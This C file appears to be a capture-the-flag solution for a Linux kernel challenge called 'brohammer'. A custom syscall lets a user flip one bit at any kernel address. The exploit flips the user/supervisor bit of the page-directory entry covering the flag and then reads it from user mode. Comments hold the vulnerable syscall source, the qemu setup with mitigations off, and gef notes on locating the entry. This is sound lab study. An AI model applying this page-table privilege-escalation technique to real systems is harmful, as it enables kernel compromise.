#define _GNU_SOURCE   /* glibc only declares syscall() in <unistd.h> outside strict -std modes */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>
#ifndef __NR_BROHAMMER
#define __NR_BROHAMMER 333
#endif
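/*
 * Thin wrapper around the challenge's custom syscall (number 333 unless the
 * build environment already defines __NR_BROHAMMER).  The kernel side (see the
 * quoted source below) XORs one bit of the long at the caller-supplied address
 * and refuses with -EPERM after the first flip.
 *
 * addr: address handed to the kernel unchanged (the kernel does not validate it).
 * bit:  index of the bit to flip; passed as a long so the variadic call hands
 *       the kernel a full register rather than an int with unspecified upper bits.
 *
 * Returns the raw syscall() result: 0 on success, -1 with errno set on failure.
 * The original declared this void while still returning a value (a constraint
 * violation in C) and so discarded the only error signal the caller gets before
 * it goes on to dereference kernel memory.
 */
long brohammer(unsigned long addr, int bit)
{
    return syscall(__NR_BROHAMMER, addr, (long)bit);
}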
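/*
 * Flip the U/S (user/supervisor) bit of the page-directory entry covering the
 * 2 MiB physical page that holds the flag, then read the flag from ring 3
 * straight through the kernel direct map.
 *
 * Both addresses are hard-coded for this challenge image booted with nokaslr
 * (see the qemu command line and the page-table dump in the comments below):
 *   pde_addr  - direct-map virtual address of the PDE for phys 0x4e00000-0x5000000
 *               (its value in the dump was 0x8000000004e001e3: P|RW|A|D|PS|G, NX,
 *               U/S clear)
 *   flag      - direct-map virtual address of the flag string (phys 0x4e19000)
 * They are meaningless on any other kernel build or memory layout.
 *
 * Returns 0 after printing the flag, EXIT_FAILURE if the syscall reported an
 * error.  A refused flip must not be followed by the read: the page would still
 * be supervisor-only and the load would just SIGSEGV without explanation.
 */
int main(void)
{
    const unsigned long pde_addr = 0xffff8800018fb138UL;
    const int us_bit = 2;   /* bit 2 of an x86 page-table entry = user/supervisor */
    const unsigned char *flag = (const unsigned char *)0xffff880004e19000ULL;
    const size_t flag_max = 0x100;   /* upper bound on the bytes read, as in the original */

    /* syscall() leaves errno untouched on success, so clearing it first and
     * checking afterwards reports EPERM (second flip) or ENOSYS (syscall not
     * present) without depending on the wrapper's return type. */
    errno = 0;
    brohammer(pde_addr, us_bit);
    if (errno != 0) {
        fprintf(stderr, "brohammer: %s\n", strerror(errno));
        return EXIT_FAILURE;
    }

    /* The flag is NUL-terminated in the dump; stop at the terminator or at the
     * bound so a missing terminator cannot run the read off the page. */
    for (size_t i = 0; i < flag_max && flag[i] != '\0'; i++) {
        putchar(flag[i]);
    }
    return 0;
}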
/*
#!/bin/bash
qemu-system-x86_64 \
-m 128M \
-kernel ./kernel \
-initrd ./initrd \
-nographic \
-monitor /dev/null \
-append "nokaslr root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet" 2>/dev/null
NO KASLR, SMEP, SMAP, KPTI — read as: none of these four mitigations is enabled (KASLR is switched off by the nokaslr option above). The exploit below depends at least on KPTI being off: it reads kernel direct-map addresses from ring 3 through the kernel's own page tables, which KPTI would prevent by giving user mode a separate page-table hierarchy that does not contain the direct map.
*/
/*
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
#ifndef __NR_BROHAMMER
#define __NR_BROHAMMER 333
#endif
unsigned long flips = 0;
SYSCALL_DEFINE2(brohammer, long *, addr, long, bit) // entry point of the custom syscall (number 333 is assigned in the syscall table, not by this macro): XORs one bit of the long at the caller-supplied address, once per boot (flips is a global). addr is dereferenced directly with no access_ok()/copy_from_user() validation and bit is not range-checked, so any kernel address can be modified
{
if (flips >= 1)
{
printk(KERN_INFO "brohammer: nope\n");
return -EPERM;
}
*addr ^= (1ULL << (bit));
(*(long *) &flips)++;
return 0;
}
*/
/*
0xffff880000000000-0xffff880000099000 0x0000000000000000-0x0000000000099000 0x99000 0x1000 153 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880000099000-0xffff88000009a000 0x0000000000099000-0x000000000009a000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff88000009a000-0xffff88000009b000 0x000000000009a000-0x000000000009b000 0x1000 0x1000 1 [R-X KERN ACCESSED DIRTY GLOBAL]
0xffff88000009b000-0xffff880000200000 0x000000000009b000-0x0000000000200000 0x165000 0x1000 357 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880000200000-0xffff880001000000 0x0000000000200000-0x0000000001000000 0xe00000 0x200000 7 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880001000000-0xffff880001400000 0x0000000001000000-0x0000000001400000 0x400000 0x200000 2 [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff880001400000-0xffff880001404000 0x0000000001400000-0x0000000001404000 0x4000 0x1000 4 [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff880001404000-0xffff880001600000 0x0000000001404000-0x0000000001600000 0x1fc000 0x1000 508 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880001600000-0xffff880001671000 0x0000000001600000-0x0000000001671000 0x71000 0x1000 113 [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff880001671000-0xffff880001800000 0x0000000001671000-0x0000000001800000 0x18f000 0x1000 399 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880001800000-0xffff880007e00000 0x0000000001800000-0x0000000007e00000 0x6600000 0x200000 51 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880007e00000-0xffff880007fe0000 0x0000000007e00000-0x0000000007fe0000 0x1e0000 0x1000 480 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000000000-0xffffc90000004000 0x0000000000086000-0x000000000008a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000008000-0xffffc9000000c000 0x0000000000010000-0x0000000000014000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000010000-0xffffc90000014000 0x0000000000016000-0x000000000001a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000018000-0xffffc9000001c000 0x000000000001c000-0x0000000000020000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000020000-0xffffc90000024000 0x0000000000023000-0x0000000000027000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000028000-0xffffc9000002c000 0x000000000002a000-0x000000000002e000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000030000-0xffffc90000034000 0x0000000000030000-0x0000000000034000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000038000-0xffffc9000003c000 0x0000000000036000-0x000000000003a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000040000-0xffffc90000044000 0x0000000000058000-0x000000000005c000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000048000-0xffffc9000004c000 0x000000000005d000-0x0000000000061000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000050000-0xffffc90000054000 0x000000000019b000-0x000000000019f000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000058000-0xffffc9000005c000 0x000000000358d000-0x0000000003591000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000060000-0xffffc90000064000 0x00000000035cb000-0x00000000035cf000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000065000-0xffffc90000068000 0x00000000023c8000-0x00000000023cb000 0x3000 0x1000 3 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc9000006c000-0xffffc90000070000 0x00000000023db000-0x00000000023df000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000074000-0xffffc90000075000 0x00000000023ec000-0x00000000023ed000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000075000-0xffffc90000076000 0x000000000772b000-0x000000000772c000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000076000-0xffffc90000077000 0x000000000772e000-0x000000000772f000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000077000-0xffffc90000078000 0x0000000007718000-0x0000000007719000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffea0000000000-0xffffea0000200000 0x0000000006000000-0x0000000006200000 0x200000 0x200000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000000000-0xfffffe0000001000 0x00000000018c3000-0x00000000018c4000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000001000-0xfffffe0000002000 0x0000000001809000-0x000000000180a000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000002000-0xfffffe0000003000 0x000000000180f000-0x0000000001810000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000003000-0xfffffe0000006000 0x0000000001806000-0x0000000001809000 0x3000 0x1000 3 [R-- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000006000-0xfffffe0000007000 0x0000000001401000-0x0000000001402000 0x1000 0x1000 1 [R-X KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000007000-0xfffffe000000c000 0x000000000180a000-0x000000000180f000 0x5000 0x1000 5 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffff81000000-0xffffffff81400000 0x0000000001000000-0x0000000001400000 0x400000 0x200000 2 [R-X KERN ACCESSED DIRTY GLOBAL]
0xffffffff81400000-0xffffffff81404000 0x0000000001400000-0x0000000001404000 0x4000 0x1000 4 [R-X KERN ACCESSED DIRTY GLOBAL]
0xffffffff81404000-0xffffffff81600000 0x0000000001404000-0x0000000001600000 0x1fc000 0x1000 508 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffff81600000-0xffffffff81800000 0x0000000001600000-0x0000000001800000 0x200000 0x200000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
0xffffffff81800000-0xffffffff81a00000 0x0000000001800000-0x0000000001a00000 0x200000 0x1000 512 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffffff5fc000-0xffffffffff5fd000 0x00000000fec00000-0x00000000fec01000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffffff5fd000-0xffffffffff5fe000 0x00000000fee00000-0x00000000fee01000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffffff600000-0xffffffffff601000 0x0000000001804000-0x0000000001805000 0x1000 0x1000 1 [R-- USER ACCESSED DIRTY GLOBAL]
gef> search-pattern "this is where the flag will be on the remote host"
[+] Searching 'this is where the flag will be on the remote host' in whole memory
[+] In (0xffff880001800000-0xffff880007e00000 [rw-])
0xffff880004e19000: 74 68 69 73 20 69 73 20 77 68 65 72 65 20 74 68 | this is where th |
[+] Searching 't\x00h\x00i\x00s\x00 \x00i\x00s\x00 \x00w\x00h\x00e\x00r\x00e\x00 \x00t\x00h\x00e\x00 \x00f\x00l\x00a\x00g\x00 \x00w\x00i\x00l\x00l\x00 \x00b\x00e\x00 \x00o\x00n\x00 \x00t\x00h\x00e\x00 \x00r\x00e\x00m\x00o\x00t\x00e\x00 \x00h\x00o\x00s\x00t\x00' in whole memory
gef> x/s 0xffff880004e19000
0xffff880004e19000: "this is where the flag will be on the remote host...\n"
gef> xinfo 0xffff880004e19000
---------------------------------------------------------------------------------------- xinfo: 0xffff880004e19000 ----------------------------------------------------------------------------------------
Virtual address start-end Physical address start-end Total size Page size Count Flags
0xffff880001800000-0xffff880007e00000 0x0000000001800000-0x0000000007e00000 0x6600000 0x200000 51 [RW- KERN ACCESSED DIRTY GLOBAL]
Offset (from virt mapped): 0xffff880001800000 + 0x3619000
Offset (from phys mapped): 0x1800000 + 0x3619000
Physical address : 0x4e19000
Physical map pages size : 2 MiB
0x4e19000 % 2**21 = 0x19000, so the 2 MiB-aligned physical page containing the flag starts at 0x4e19000 - 0x19000 = 0x4e00000
Knowing from xinfo that the flag lives in a 2 MiB page whose frame starts at physical 0x4e00000, I looked for the page-directory entry that maps that frame by dumping physical memory with the gef 'xp' command:
xp -- Dump physical memory via qemu-monitor. (gef)
After manually inspecting the entries from physical 0x1800000 onward I reached:
gef> xp 0x18fb138
00000000018fb138: 0x8000000004e001e3
0x8000000004e001e3 is a 2 MiB page-directory entry (PS, bit 7, is set) whose frame field is 0x4e00000 — the page containing the flag. Its direct-map virtual address is 0xffff880000000000 + 0x18fb138 = 0xffff8800018fb138, which is the address the syscall must target. Which bit to flip is explained in this StackOverflow answer on page-table entry privilege bits:
https://stackoverflow.com/questions/59948388/how-to-properly-set-privileges-in-page-directory-entries
Bit 2 of a page-table entry is the U/S (user/supervisor) flag. In 0x...1e3 (= P|RW|A|D|PS|G, with NX set in bit 63) that bit is 0, so XOR-ing it sets it and makes the whole 2 MiB page 0x4e00000-0x5000000, flag included, accessible from user mode — read/write, since the entry is RW, but not execute, since NX stays set. User access also requires the U/S flag in the PML4E/PDPTE above this entry; that a single flip was enough shows those upper-level entries are already user-permitted on this kernel.
*/